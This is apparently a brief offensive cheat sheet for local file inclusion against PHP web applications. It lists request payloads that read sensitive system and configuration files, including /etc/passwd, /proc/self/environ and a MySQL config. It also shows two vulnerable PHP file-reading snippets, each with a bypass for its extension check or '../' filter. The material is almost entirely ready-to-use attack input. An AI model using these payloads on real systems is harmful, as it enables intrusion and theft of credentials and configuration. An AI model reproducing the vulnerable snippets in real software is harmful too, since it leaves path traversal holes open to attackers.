?page=C:/Windows/system.ini ( Windows )
?page=/etc/passwd ( Linux )
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/mysql/my.cnf
/proc/self/environ
/proc/version
/proc/cmdline
.DS_Store (MAC)
============================================
Nullbyte fixed in 5.3.8
===============================
if (substr($_GET['file'], -4, 4) != '.php')
 echo file_get_contents($_GET['file']);
 --> bypass by file.ph< --> view source
 =============================
  $file = str_replace('../', '', $_GET['file']);
 --> bypass by ..././../..././../..././etc/passwd
